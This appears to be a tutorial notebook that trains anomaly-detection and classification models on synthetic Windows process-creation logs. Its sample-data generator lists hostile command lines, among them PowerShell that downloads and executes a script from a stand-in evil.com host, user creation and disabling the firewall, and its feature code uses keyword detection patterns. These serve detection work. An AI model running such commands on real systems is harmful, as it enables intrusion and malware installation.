# Security Anomaly Detection with Machine Learning

This notebook demonstrates security analytics using machine learning techniques to identify anomalous behavior in process execution telemetry. The examples run on synthetic sample data shaped like the events we would collect from Log Analytics in our environment.

## Techniques used:
- Unsupervised anomaly detection (Isolation Forest)
- Clustering for behavior grouping
- Supervised classification for known attack pattern detection

**Author:** Your Name
**Date:** April 12, 2025

In [None]:
%%sh
# Install required packages (a cell magic such as %%sh must be the first line of the cell)
pip install --upgrade pandas numpy scikit-learn matplotlib seaborn plotly pyarrow requests joblib azure-identity azure-storage-blob

## Setup Authentication with Azure Managed Identity

This notebook uses managed identity for secure, passwordless authentication to Azure resources.

In [None]:
import os
import time
import pandas as pd
import numpy as np
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
import seaborn as sns
import plotly.express as px
import warnings
warnings.filterwarnings('ignore')

from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.ensemble import IsolationForest, RandomForestClassifier
from sklearn.cluster import DBSCAN
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, confusion_matrix

# For Azure authentication
from azure.identity import DefaultAzureCredential, ManagedIdentityCredential

print("Libraries imported successfully")

## Connect to Log Analytics using Managed Identity

We'll use managed identity to securely access our security logs in Log Analytics workspace.

In [None]:
# Define Azure credential strategy
def get_credential():
    """Get the appropriate credential based on environment"""
    try:
        # Try managed identity first (when running in Synapse).
        # The constructor does not contact the identity endpoint, so request
        # a token here to confirm that managed identity is actually available.
        credential = ManagedIdentityCredential()
        credential.get_token("https://api.loganalytics.io/.default")
        print("Using managed identity for authentication")
        return credential
    except Exception as e:
        # Fall back to default credentials (dev environment)
        print(f"Managed identity not available ({e}), falling back to default credentials")
        return DefaultAzureCredential()

# Create credential object
credential = get_credential()

# Define workspace info (these values will be set through Synapse parameters)
workspace_id = "WORKSPACE_ID"  # This will be parameterized
log_analytics_endpoint = f"https://api.loganalytics.io/v1/workspaces/{workspace_id}"

## Query Security Telemetry Data

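We'll query process creation events (Windows Event ID 4688) from Log Analytics to build our anomaly detection model. In this demo the query is defined but not executed; synthetic sample data stands in for the results.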
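
As a minimal sketch of the conversion step that is commented out in the cell below, the following turns a query response into a DataFrame. It assumes the response has the `tables` / `columns` / `rows` layout that the commented-out line relies on; the helper name `response_to_dataframe` and the sample payload are hypothetical and written by hand for illustration.

```python
import pandas as pd

def response_to_dataframe(response_json):
    """Convert a query response (tables/columns/rows layout) into a DataFrame."""
    table = response_json["tables"][0]
    column_names = [col["name"] for col in table["columns"]]
    return pd.DataFrame(table["rows"], columns=column_names)

# Hypothetical payload, hand-written for illustration only
sample_response = {
    "tables": [{
        "name": "PrimaryResult",
        "columns": [
            {"name": "TimeGenerated", "type": "datetime"},
            {"name": "Computer", "type": "string"},
            {"name": "ProcessName", "type": "string"},
        ],
        "rows": [
            ["2025-04-10T08:15:00Z", "WORKSTATION1", "cmd.exe"],
            ["2025-04-10T08:16:30Z", "SERVER1", "powershell.exe"],
        ],
    }]
}

df_sample = response_to_dataframe(sample_response)
df_sample["TimeGenerated"] = pd.to_datetime(df_sample["TimeGenerated"])
print(df_sample)
```

Because `run_log_analytics_query` returns `None` on a non-200 response, a real caller would check for `None` before passing the result to a helper like this.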

In [None]:
import requests
import json

def run_log_analytics_query(query):
    """Run a KQL query against Log Analytics using managed identity"""
    token = credential.get_token("https://api.loganalytics.io/.default")
    headers = {
        'Authorization': f'Bearer {token.token}',
        'Content-Type': 'application/json'
    }
    
    body = {
        'query': query
    }
    
    response = requests.post(
        f"{log_analytics_endpoint}/query",
        headers=headers,
        json=body,
        timeout=30  # Avoid hanging the notebook if the service does not respond
    )
    
    if response.status_code == 200:
        return response.json()
    else:
        print(f"Error: {response.status_code}\n{response.text}")
        return None

# Query process execution events from the last 7 days
query = """
let timeRange = 7d;
SecurityEvent
| where TimeGenerated > ago(timeRange)
| where EventID == 4688 // Process creation events
| project 
    TimeGenerated, 
    Computer, 
    Account, 
    ProcessName=NewProcessName,
    CommandLine=CommandLine,
    ParentProcessName,
    LogonId
// Simulate query for notebook display
"""

# In a real environment, we would execute the query
# results = run_log_analytics_query(query)
# df_process = pd.DataFrame(results['tables'][0]['rows'], columns=[col['name'] for col in results['tables'][0]['columns']])

# For the notebook demo, we'll create sample data
def generate_sample_process_data(n_samples=1000):
    """Generate sample process execution data for demonstration"""
    np.random.seed(42)
    
    # Common process names and parent processes
    process_names = ['cmd.exe', 'powershell.exe', 'explorer.exe', 'svchost.exe', 'chrome.exe', 
                     'outlook.exe', 'winword.exe', 'excel.exe', 'notepad.exe', 'regsvr32.exe']
    parent_processes = ['explorer.exe', 'services.exe', 'svchost.exe', 'cmd.exe', 'powershell.exe',
                       'winlogon.exe', 'lsass.exe', 'smss.exe']
    accounts = ['SYSTEM', 'NT AUTHORITY\\SYSTEM', 'DOMAIN\\user1', 'DOMAIN\\user2', 'DOMAIN\\admin']
    computers = ['WORKSTATION1', 'WORKSTATION2', 'SERVER1', 'SERVER2', 'LAPTOP1']
    
    # Command lines (including some suspicious ones)
    normal_cmds = [
        'cmd.exe /c dir', 
        'powershell.exe -Command "Get-Process"',
        'explorer.exe /select,C:\\Windows',
        'svchost.exe -k netsvcs',
        'cmd.exe /c echo "Hello"',
        'powershell.exe -Command "Get-Service"',
        'notepad.exe C:\\temp\\file.txt',
        'winword.exe "C:\\Documents\\report.docx"'
    ]
    
    suspicious_cmds = [
        'powershell.exe -enc JAAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0A',  # Encoded command
        'cmd.exe /c net user hacker Password123! /add',  # User creation
        'regsvr32.exe /s /u /i:evil.dll scrobj.dll',  # LOLBin usage
        'powershell.exe -Command "Invoke-WebRequest -Uri http://evil.com/mal.exe -OutFile C:\\temp\\legit.exe"', # Download
        'cmd.exe /c netsh advfirewall set allprofiles state off',  # Disable firewall
        'powershell.exe -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString(\"http://evil.com/script.ps1\")"' # Hidden download and execute
    ]
    
    # Time range for the past week
    end_time = datetime.now()
    start_time = end_time - timedelta(days=7)
    
    # Generate data
    data = []
    for i in range(n_samples):
        # Add a small number of suspicious commands (5%)
        is_suspicious = np.random.random() < 0.05
        
        # Select process details
        if is_suspicious:
            cmd = np.random.choice(suspicious_cmds)
            process = cmd.split(' ', 1)[0]  # The executable is the first token, so regsvr32 commands map to regsvr32.exe
            parent = np.random.choice(['explorer.exe', 'services.exe', 'lsass.exe'])  # More likely to be from these
        else:
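            process = np.random.choice(process_names)
            # Use a benign command line that matches the chosen process, if one exists
            matching_cmds = [c for c in normal_cmds if c.startswith(process)]
            cmd = np.random.choice(matching_cmds) if matching_cmds else process
            parent = np.random.choice(parent_processes)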
        
        # Generate random timestamp in the past week
        random_seconds = np.random.randint(0, int((end_time - start_time).total_seconds()))
        event_time = start_time + timedelta(seconds=random_seconds)
        
        # Create event record
        data.append({
            'TimeGenerated': event_time.isoformat(),
            'Computer': np.random.choice(computers),
            'Account': np.random.choice(accounts),
            'ProcessName': process,
            'CommandLine': cmd,
            'ParentProcessName': parent,
            'LogonId': f"0x{np.random.randint(10000, 99999):x}",
            'IsKnownSuspicious': 1 if is_suspicious else 0  # Ground truth for testing
        })
    
    return pd.DataFrame(data)

# Generate sample data
df_process = generate_sample_process_data(2000)
df_process['TimeGenerated'] = pd.to_datetime(df_process['TimeGenerated'])

print(f"Loaded {len(df_process)} process execution events")
df_process.head()

## Data Preprocessing

Let's prepare the data for machine learning by extracting relevant features.
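
To make the text-based features concrete, here is a small sketch that applies three of the same expressions used in `extract_features` below to two hand-picked command lines. The `sample` DataFrame is illustrative only and is not part of the notebook's dataset.

```python
import pandas as pd

sample = pd.DataFrame({
    "CommandLine": [
        "cmd.exe /c dir",
        "powershell.exe -enc JAAoAGcA",
    ]
})

# Length of the command line in characters
sample["CmdLength"] = sample["CommandLine"].str.len()

# Characters that are neither word characters nor whitespace
sample["SpecialCharCount"] = sample["CommandLine"].str.count(r"[^\w\s]")

# Flags that suggest an encoded PowerShell command
sample["HasEncoding"] = sample["CommandLine"].str.contains(
    r"-enc|-encoding|-e ", case=False, regex=True
).astype(int)

print(sample)
```

Both commands contain two special characters (`.` plus `/` or `-`), so on this pair only `HasEncoding` and `CmdLength` distinguish the encoded command.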

In [None]:
# Add engineered features
def extract_features(df):
    """Extract security-relevant features from process execution data"""
    df = df.copy()  # Work on a copy so the caller's DataFrame is not modified
    # Command line length (suspicious commands are often long)
    df['CmdLength'] = df['CommandLine'].str.len()
    
    # Number of special characters (potential obfuscation)
    df['SpecialCharCount'] = df['CommandLine'].str.count(r'[^\w\s]')
    
    # Check for encoded commands (Base64 patterns)
    df['HasEncoding'] = df['CommandLine'].str.contains('-enc|-encoding|-e ', case=False, regex=True).astype(int)
    
    # Check for network indicators
    df['HasNetworkIOC'] = df['CommandLine'].str.contains('http|net |netsh|ftp:|wget|curl', case=False, regex=True).astype(int)
    
    # Check for file operations
    df['HasFileOps'] = df['CommandLine'].str.contains('copy |xcopy|move |del |erase|mkdir|rmdir|New-Item', case=False, regex=True).astype(int)
    
    # Check for privilege escalation attempts
    df['HasPrivEscIOC'] = df['CommandLine'].str.contains('runas|sudo|Administrator|add user|net user|Set-ExecutionPolicy|bypass', case=False, regex=True).astype(int)
    
    # Check for hidden window
    df['IsHiddenWindow'] = df['CommandLine'].str.contains('hidden|invisible|window hidden|-w hidden|-window h', case=False, regex=True).astype(int)
    
    # Check for unusual parent-child relationships
    unusual_parents = {
        'powershell.exe': ['lsass.exe', 'services.exe', 'smss.exe'],
        'cmd.exe': ['lsass.exe', 'services.exe', 'smss.exe'],
        'regsvr32.exe': ['powershell.exe', 'cmd.exe']
    }
    
    df['HasUnusualParent'] = 0
    for proc, parents in unusual_parents.items():
        mask = (df['ProcessName'] == proc) & (df['ParentProcessName'].isin(parents))
        df.loc[mask, 'HasUnusualParent'] = 1
    
    # SYSTEM account usage for user processes
    user_processes = ['chrome.exe', 'outlook.exe', 'winword.exe', 'excel.exe', 'notepad.exe']
    df['IsSystemOnUserProc'] = ((df['Account'].str.contains('SYSTEM')) & 
                               (df['ProcessName'].isin(user_processes))).astype(int)
    
    # Time features (hour of day can be relevant for some attacks)
    df['HourOfDay'] = df['TimeGenerated'].dt.hour
    
    # Weekend execution
    df['IsWeekend'] = df['TimeGenerated'].dt.dayofweek.isin([5, 6]).astype(int)
    
    return df

# Extract features
df_features = extract_features(df_process)

# Display the data with features
print(f"Data shape after feature extraction: {df_features.shape}")
df_features[['ProcessName', 'ParentProcessName', 'CmdLength', 'HasEncoding', 'HasNetworkIOC', 'HasUnusualParent', 'IsKnownSuspicious']].head(10)

## Exploratory Data Analysis

Let's visualize some patterns in our security telemetry.
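
Alongside the plots, a per-class summary table can be a quick numeric check. The sketch below uses a tiny hand-made DataFrame (`toy`, hypothetical values) with the same column names as the notebook's features; the same `groupby` call could be applied to `df_features`.

```python
import pandas as pd

# Hypothetical values, chosen only to illustrate the aggregation
toy = pd.DataFrame({
    "IsKnownSuspicious": [0, 0, 1, 1],
    "CmdLength": [10, 20, 100, 120],
    "HasEncoding": [0, 0, 1, 0],
})

# Mean of each feature per class; for 0/1 flags this is the share of events with the flag set
summary = toy.groupby("IsKnownSuspicious")[["CmdLength", "HasEncoding"]].mean()
print(summary)
```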

In [None]:
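# Set up plotting styles
# (the 'seaborn-darkgrid' style name was removed from recent matplotlib releases; seaborn's own theme gives the same look)
sns.set_theme(style='darkgrid')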
plt.rcParams['figure.figsize'] = (12, 8)

# Process distribution
plt.figure(figsize=(14, 6))
process_counts = df_features['ProcessName'].value_counts().head(10)
sns.barplot(x=process_counts.index, y=process_counts.values)
plt.title('Top 10 Processes by Frequency', fontsize=16)
plt.xticks(rotation=45)
plt.ylabel('Count')
plt.tight_layout()
plt.show()

# Command line length distribution
plt.figure(figsize=(14, 6))
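# Map the labels before plotting so the legend entries cannot be mislabeled
class_labels = df_features['IsKnownSuspicious'].map({0: 'Normal', 1: 'Suspicious'}).rename('Class')
sns.histplot(data=df_features, x='CmdLength', hue=class_labels, bins=30, alpha=0.6)
plt.title('Command Line Length Distribution', fontsize=16)
plt.xlabel('Command Length (characters)')
plt.ylabel('Frequency')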
plt.tight_layout()
plt.show()

# Feature correlation with suspiciousness
corr_columns = ['CmdLength', 'SpecialCharCount', 'HasEncoding', 'HasNetworkIOC', 
                'HasFileOps', 'HasPrivEscIOC', 'IsHiddenWindow', 
                'HasUnusualParent', 'IsSystemOnUserProc', 'IsWeekend', 'IsKnownSuspicious']

plt.figure(figsize=(12, 10))
corr_matrix = df_features[corr_columns].corr()
sns.heatmap(corr_matrix, annot=True, cmap='coolwarm', fmt='.2f', linewidths=0.5)
plt.title('Feature Correlation Matrix', fontsize=16)
plt.tight_layout()
plt.show()

# Time-based analysis
plt.figure(figsize=(14, 6))
# 'h' is the hourly alias; the uppercase 'H' is deprecated in recent pandas releases
time_series = df_features.groupby(df_features['TimeGenerated'].dt.floor('h')).size()
suspicious_events = df_features[df_features['IsKnownSuspicious'] == 1]
time_series_susp = suspicious_events.groupby(suspicious_events['TimeGenerated'].dt.floor('h')).size()

plt.plot(time_series.index, time_series.values, label='All Events')
plt.plot(time_series_susp.index, time_series_susp.values, 'r-', label='Suspicious Events')
plt.title('Process Execution Events Over Time', fontsize=16)
plt.xlabel('Time')
plt.ylabel('Event Count')
plt.legend()
plt.xticks(rotation=45)
plt.tight_layout()
plt.show()

## Approach 1: Isolation Forest for Anomaly Detection

Let's use an unsupervised learning approach to detect anomalies in process execution.
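
Before applying it to the process data, here is a minimal sketch of how Isolation Forest's two outputs relate, using synthetic 2-D points (an assumption made purely for illustration). `decision_function` returns a score where negative means anomalous, and `predict` returns -1 exactly for those negative scores; `contamination` sets the share of training points that end up below zero.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Synthetic data: a dense blob plus a few far-away points
rng = np.random.RandomState(0)
X_iso_demo = np.vstack([
    rng.normal(loc=0.0, scale=1.0, size=(190, 2)),
    rng.uniform(low=6.0, high=8.0, size=(10, 2)),
])

iso_demo = IsolationForest(contamination=0.05, n_estimators=100, random_state=42)
iso_demo.fit(X_iso_demo)

iso_scores = iso_demo.decision_function(X_iso_demo)  # negative = anomalous
iso_labels = iso_demo.predict(X_iso_demo)            # -1 = anomaly, 1 = normal

n_flagged = int(np.sum(iso_labels == -1))
signs_agree = bool(np.array_equal(iso_labels == -1, iso_scores < 0))
print(f"Flagged {n_flagged} of {len(X_iso_demo)} points")
print("predict() agrees with the sign of decision_function():", signs_agree)
```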

In [None]:
# Prepare features for Isolation Forest
numeric_features = ['CmdLength', 'SpecialCharCount', 'HourOfDay',
                    'HasEncoding', 'HasNetworkIOC', 'HasFileOps',
                    'HasPrivEscIOC', 'IsHiddenWindow', 'HasUnusualParent',
                    'IsSystemOnUserProc', 'IsWeekend']

categorical_features = ['ProcessName', 'ParentProcessName']

# Create preprocessing pipeline
numeric_transformer = Pipeline(steps=[
    ('scaler', StandardScaler())
])

categorical_transformer = Pipeline(steps=[
    ('onehot', OneHotEncoder(handle_unknown='ignore'))
])

preprocessor = ColumnTransformer(
    transformers=[
        ('num', numeric_transformer, numeric_features),
        ('cat', categorical_transformer, categorical_features)
    ])

# Create and train the Isolation Forest model
isolation_forest = Pipeline(steps=[('preprocessor', preprocessor),
                                  ('model', IsolationForest(contamination=0.05,  # Expect ~5% anomalies
                                                          random_state=42, 
                                                          n_estimators=100))])

# Fit the model
isolation_forest.fit(df_features[numeric_features + categorical_features])

# Get anomaly scores and predictions
# Anomaly score: negative = anomalous, more negative = more anomalous
anomaly_scores = isolation_forest.decision_function(df_features[numeric_features + categorical_features])
# Predictions: -1 = anomaly, 1 = normal
anomaly_predictions = isolation_forest.predict(df_features[numeric_features + categorical_features])

# Add predictions to dataframe
df_features['AnomalyScore'] = anomaly_scores
df_features['IsAnomaly'] = np.where(anomaly_predictions == -1, 1, 0)

# Compute detection accuracy (using our synthetic ground truth)
# confusion_matrix and classification_report were imported in the setup cell

print("\nIsolation Forest Performance:")
print(confusion_matrix(df_features['IsKnownSuspicious'], df_features['IsAnomaly']))
print("\n")
print(classification_report(df_features['IsKnownSuspicious'], df_features['IsAnomaly']))

## Approach 2: DBSCAN for Behavioral Clustering

Now let's identify clusters of similar behavior and analyze them for security implications.
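
As a small illustration of how DBSCAN labels points, the sketch below clusters nine hand-placed 2-D points (illustrative values, not notebook data). Points that have no dense neighborhood within `eps` receive the label -1, which is what the later plotting code treats as noise.

```python
import numpy as np
from sklearn.cluster import DBSCAN

# Two tight groups of four points each, plus one isolated point
toy_points = np.array([
    [0.0, 0.0], [0.1, 0.0], [0.0, 0.1], [0.1, 0.1],
    [5.0, 5.0], [5.1, 5.0], [5.0, 5.1], [5.1, 5.1],
    [20.0, 20.0],
])

toy_labels = DBSCAN(eps=0.5, min_samples=3).fit_predict(toy_points)
print(toy_labels)  # [ 0  0  0  0  1  1  1  1 -1]
```

The `eps` and `min_samples` values here are chosen to fit the toy data; on standardized, one-hot-encoded features the appropriate values depend on the data and usually need tuning.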

In [None]:
# Prepare data for clustering
# We'll use the same preprocessing as before
features_preprocessed = preprocessor.fit_transform(df_features[numeric_features + categorical_features])

# Apply DBSCAN clustering
dbscan = DBSCAN(eps=1.0, min_samples=10)
clusters = dbscan.fit_predict(features_preprocessed)

# Add clusters to dataframe
df_features['Cluster'] = clusters

# Check distribution of clusters
cluster_counts = df_features['Cluster'].value_counts().sort_index()
print("\nCluster Distribution:")
print(cluster_counts)

# Check suspicious activity in each cluster
cluster_risk = df_features.groupby('Cluster')['IsKnownSuspicious'].mean().sort_values(ascending=False)
print("\nClusters by Risk Score (proportion of suspicious activity):")
print(cluster_risk)

# Visualize clusters vs. anomaly score (2D projection)
from sklearn.decomposition import PCA

# Reduce to 2D for visualization
pca = PCA(n_components=2)
features_2d = pca.fit_transform(features_preprocessed)

# Create visualization dataframe
viz_df = pd.DataFrame({
    'x': features_2d[:, 0],
    'y': features_2d[:, 1],
    'Cluster': clusters,
    'ProcessName': df_features['ProcessName'],
    'IsKnownSuspicious': df_features['IsKnownSuspicious'],
    'IsAnomaly': df_features['IsAnomaly']
})

# Plot clusters
plt.figure(figsize=(14, 10))

# Plot each cluster with a different color
colors = plt.cm.rainbow(np.linspace(0, 1, len(cluster_counts)))
for i, (cluster_id, color) in enumerate(zip(cluster_counts.index, colors)):
    # Noise points (cluster=-1) are black
    if cluster_id == -1:
        cluster_color = 'black'
        marker = 'x'
        label = 'Noise'
    else:
        cluster_color = color
        marker = 'o'
        label = f'Cluster {cluster_id}'
    
    cluster_points = viz_df[viz_df['Cluster'] == cluster_id]
    plt.scatter(cluster_points['x'], cluster_points['y'], c=[cluster_color], marker=marker, label=label, alpha=0.7)

# Mark known suspicious points with red circles
suspicious_points = viz_df[viz_df['IsKnownSuspicious'] == 1]
plt.scatter(suspicious_points['x'], suspicious_points['y'], edgecolors='red', facecolors='none', 
            s=100, linewidths=2, label='Known Suspicious')

plt.title('Behavioral Clusters of Process Execution Events', fontsize=16)
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.legend(loc='best')
plt.tight_layout()
plt.show()

# Find the highest risk clusters
high_risk_clusters = cluster_risk[cluster_risk > 0.2].index.tolist()
if high_risk_clusters:
    print("\nHigh Risk Cluster Analysis:")
    for cluster in high_risk_clusters:
        cluster_df = df_features[df_features['Cluster'] == cluster]
        print(f"\nCluster {cluster} - Risk Score: {cluster_risk[cluster]:.2f}, Size: {len(cluster_df)}")
        print("Top processes:")
        print(cluster_df['ProcessName'].value_counts().head(3))
        print("Sample commands:")
        print(cluster_df['CommandLine'].head(2).to_string())

## Approach 3: Supervised Classification

Now let's train a supervised model to predict suspicious behavior based on our labeled data.
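
With only about 5% of events labeled suspicious, the split in the next cell passes `stratify=y` so that both partitions keep the same class ratio. A minimal sketch with made-up labels (950 normal, 50 suspicious) shows the effect:

```python
import numpy as np
from sklearn.model_selection import train_test_split

# Made-up labels with a 5% positive rate, for illustration only
y_split_demo = np.array([0] * 950 + [1] * 50)
X_split_demo = np.arange(len(y_split_demo)).reshape(-1, 1)

X_tr, X_te, y_tr, y_te = train_test_split(
    X_split_demo, y_split_demo, test_size=0.3, random_state=42, stratify=y_split_demo
)

print(f"Positive rate: train={y_tr.mean():.3f}, test={y_te.mean():.3f}")
```

Without stratification, a random 30% split of a rare class can leave the test set with noticeably more or fewer positives than expected, which makes precision and recall estimates less stable.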

In [None]:
# Prepare data for supervised learning
X = df_features[numeric_features + categorical_features]
y = df_features['IsKnownSuspicious']

# Split into train/test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42, stratify=y)

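# Create the pipeline with preprocessing and the classifier.
# clone() gives this pipeline its own unfitted preprocessor, so fitting on the
# training split does not refit the instance shared with the Isolation Forest pipeline.
from sklearn.base import clone

rf_pipeline = Pipeline([
    ('preprocessor', clone(preprocessor)),
    ('classifier', RandomForestClassifier(n_estimators=100, random_state=42))
])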

# Train the model
rf_pipeline.fit(X_train, y_train)

# Evaluate the model
y_pred = rf_pipeline.predict(X_test)
y_pred_proba = rf_pipeline.predict_proba(X_test)[:, 1]

print("\nRandom Forest Classifier Performance:")
print(confusion_matrix(y_test, y_pred))
print("\n")
print(classification_report(y_test, y_pred))

# Plot feature importance
# Extract feature names from the preprocessor that was fitted inside the pipeline
fitted_preprocessor = rf_pipeline.named_steps['preprocessor']
feature_names_onehot = fitted_preprocessor.named_transformers_['cat']['onehot'].get_feature_names_out(categorical_features)
feature_names = numeric_features + list(feature_names_onehot)

# Extract and plot feature importances
importances = rf_pipeline.named_steps['classifier'].feature_importances_
indices = np.argsort(importances)[::-1]

# Take top 15 features
top_n = 15

plt.figure(figsize=(14, 8))
plt.title('Feature Importance for Suspicious Process Detection', fontsize=16)
plt.bar(range(top_n), importances[indices][:top_n], align='center')
plt.xticks(range(top_n), [feature_names[i] for i in indices][:top_n], rotation=90)
plt.tight_layout()
plt.show()

## Combining Models for Improved Detection

Now let's combine our models to create a more robust detection system.
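
The combination used in the next cell is a weighted sum: the Isolation Forest score is min-max normalized and inverted so that 1 means most anomalous, then blended with the Random Forest probability using weights 0.4 and 0.6. The sketch below works through that arithmetic on three made-up events. The helper name `combined_risk` and the zero-span guard are assumptions added for illustration, not part of the notebook's code.

```python
import numpy as np

def combined_risk(anomaly_scores, rf_probabilities, w_anomaly=0.4, w_rf=0.6):
    """Blend inverted, min-max normalized anomaly scores with classifier probabilities."""
    scores = np.asarray(anomaly_scores, dtype=float)
    probs = np.asarray(rf_probabilities, dtype=float)
    span = scores.max() - scores.min()
    if span == 0:
        # Assumption: if every score is identical, treat all events as non-anomalous
        normalized = np.zeros_like(scores)
    else:
        # Lowest raw score (most anomalous) maps to 1, highest maps to 0
        normalized = 1 - (scores - scores.min()) / span
    return w_anomaly * normalized + w_rf * probs

# Made-up scores for three events
demo_risk = combined_risk([-0.2, 0.0, 0.2], [0.9, 0.5, 0.1])
demo_high_risk = demo_risk >= 0.7

print(np.round(demo_risk, 2))
print(demo_high_risk)
```

For the first event the normalized anomaly score is 1, so the combined score is 0.4 * 1 + 0.6 * 0.9 = 0.94, which is the only one above the 0.7 threshold. Because min-max normalization depends on the batch being scored, the same event can receive a different combined score in a different batch.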

In [None]:
# Apply our supervised model to the entire dataset
# (this includes the rows it was trained on, so the combined metrics below are optimistic)
df_features['RF_Probability'] = rf_pipeline.predict_proba(X)[:, 1]
df_features['RF_Prediction'] = rf_pipeline.predict(X)

# Create a combined risk score
# 1. Normalize anomaly scores to 0-1 range (1 = more anomalous)
min_anomaly_score = df_features['AnomalyScore'].min()
max_anomaly_score = df_features['AnomalyScore'].max()
df_features['NormalizedAnomalyScore'] = 1 - ((df_features['AnomalyScore'] - min_anomaly_score) / 
                                           (max_anomaly_score - min_anomaly_score))

# 2. Combine the scores (anomaly detection + supervised prediction)
df_features['CombinedRiskScore'] = 0.4 * df_features['NormalizedAnomalyScore'] + 0.6 * df_features['RF_Probability']

# Set a threshold for high-risk events
risk_threshold = 0.7
df_features['IsHighRisk'] = (df_features['CombinedRiskScore'] >= risk_threshold).astype(int)

# Evaluate the combined approach
print("\nCombined Model Performance:")
print(confusion_matrix(df_features['IsKnownSuspicious'], df_features['IsHighRisk']))
print("\n")
print(classification_report(df_features['IsKnownSuspicious'], df_features['IsHighRisk']))

# Visualize the results
plt.figure(figsize=(14, 8))
plt.scatter(df_features['NormalizedAnomalyScore'], df_features['RF_Probability'], 
            c=df_features['IsKnownSuspicious'], cmap='coolwarm', alpha=0.7)

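# Add a line for the risk threshold
# (dedicated variable names avoid overwriting the label vector `y` defined earlier)
threshold_x = np.linspace(0, 1, 100)
threshold_y = (risk_threshold - 0.4 * threshold_x) / 0.6
plt.plot(threshold_x, threshold_y, 'k--', label=f'Risk Threshold ({risk_threshold})')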

plt.title('Combined Risk Assessment', fontsize=16)
plt.xlabel('Normalized Anomaly Score (Isolation Forest)')
plt.ylabel('Probability of Suspicious (Random Forest)')
plt.colorbar(label='Known Suspicious')
plt.legend()
plt.tight_layout()
plt.show()

# Display the highest risk events for analysis
high_risk_events = df_features[df_features['CombinedRiskScore'] >= 0.8].sort_values(
    by='CombinedRiskScore', ascending=False)
print("\nTop High-Risk Events:")
print(high_risk_events[['ProcessName', 'CommandLine', 'CombinedRiskScore', 
                        'IsKnownSuspicious']].head(10).to_string())

## Save Model for Production Use

Let's save our trained models for deployment in production.
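
A quick way to check a saved model is to load it back and compare predictions. The sketch below does this round trip with a small stand-in pipeline and a temporary directory; the data, the pipeline, and the file name `demo_model.pkl` are assumptions for illustration only.

```python
import os
import tempfile

import joblib
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler

# Small synthetic training set
rng = np.random.RandomState(0)
X_small = rng.normal(size=(100, 3))
y_small = (X_small[:, 0] > 0).astype(int)

demo_pipeline = Pipeline([
    ("scaler", StandardScaler()),
    ("classifier", RandomForestClassifier(n_estimators=10, random_state=42)),
])
demo_pipeline.fit(X_small, y_small)

# Save to a temporary directory and load the pipeline back
with tempfile.TemporaryDirectory() as tmp_dir:
    model_path = os.path.join(tmp_dir, "demo_model.pkl")
    joblib.dump(demo_pipeline, model_path)
    restored_pipeline = joblib.load(model_path)

same_predictions = bool(np.array_equal(
    demo_pipeline.predict(X_small), restored_pipeline.predict(X_small)
))
print("Round-trip predictions match:", same_predictions)
```

Files written by `joblib.dump` are pickle-based, so they should only be loaded from trusted locations, and ideally with the same scikit-learn version that produced them.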

In [None]:
import joblib
import os

# Create models directory if it doesn't exist
models_dir = './models'
os.makedirs(models_dir, exist_ok=True)

# Save the models
joblib.dump(isolation_forest, os.path.join(models_dir, 'isolation_forest_model.pkl'))
joblib.dump(rf_pipeline, os.path.join(models_dir, 'random_forest_model.pkl'))

print(f"Models saved to {models_dir}")

## Integration with Azure ML for Deployment

Now let's prepare for model deployment using Azure ML.
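
The scoring script in the next cell parses its input with `json.loads` and passes the result to `pd.DataFrame`. A list of records is one JSON shape that survives that path; the sketch below builds such a payload and parses it back. The `events` rows are hypothetical and show only a subset of columns, whereas the real pipeline expects every numeric and categorical feature column.

```python
import json

import pandas as pd

# Hypothetical events with a subset of the feature columns
events = pd.DataFrame({
    "ProcessName": ["cmd.exe", "powershell.exe"],
    "ParentProcessName": ["explorer.exe", "services.exe"],
    "CmdLength": [14, 61],
    "HasEncoding": [0, 1],
})

# Client side: serialize rows as a JSON list of records
raw_data = json.dumps(events.to_dict(orient="records"))

# Service side: the same parsing steps the scoring script performs
input_df = pd.DataFrame(json.loads(raw_data))
print(input_df)
```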

In [None]:
# This code would be used for Azure ML integration in a production environment
'''
from azureml.core import Workspace, Model, Environment
from azureml.core.model import InferenceConfig
from azureml.core.webservice import AciWebservice

# Connect to the Azure ML workspace described in a local config.json
ws = Workspace.from_config()

# Register models
Model.register(workspace=ws, 
               model_path="./models/random_forest_model.pkl", 
               model_name="security_rf_model")

# Define scoring script (in a real scenario this lives in its own file or cell; %%writefile must be the first line of a cell)
%%writefile score.py
import joblib
import json
import numpy as np
import pandas as pd
from azureml.core.model import Model

def init():
    global rf_model
    model_path = Model.get_model_path("security_rf_model")
    rf_model = joblib.load(model_path)

def run(raw_data):
    try:
        # Parse input data
        data = json.loads(raw_data)
        input_df = pd.DataFrame(data)
        
        # Make prediction
        predictions = rf_model.predict_proba(input_df)[:, 1]
        
        # Return predictions
        return json.dumps({
            "predictions": predictions.tolist(),
            "risk_score": predictions.tolist(),
            "high_risk": (predictions >= 0.7).tolist()
        })
    except Exception as e:
        return json.dumps({"error": str(e)})
'''

## Conclusion and Next Steps

In this notebook, we've demonstrated how to apply machine learning techniques to detect suspicious activity in security telemetry data. We've used:

1. **Isolation Forest** for unsupervised anomaly detection
2. **DBSCAN** for behavioral clustering
3. **Random Forest** for supervised classification
4. A **combined approach** that leverages the strengths of multiple models

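On the synthetic sample data, where suspicious commands come from a small set of fixed templates, the models are expected to separate suspicious process executions easily, so these results say little about performance on real telemetry. In a production environment, the models would need validation against labeled real-world events before being deployed as part of a broader security monitoring system.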

### Next Steps:

1. Deploy the models to Azure Functions or Azure ML for real-time scoring
2. Implement a feedback loop to improve model accuracy over time
3. Extend the analysis to include network and file system telemetry
4. Integrate with Microsoft Sentinel (formerly Azure Sentinel) for holistic security monitoring
5. Implement alert management and response automation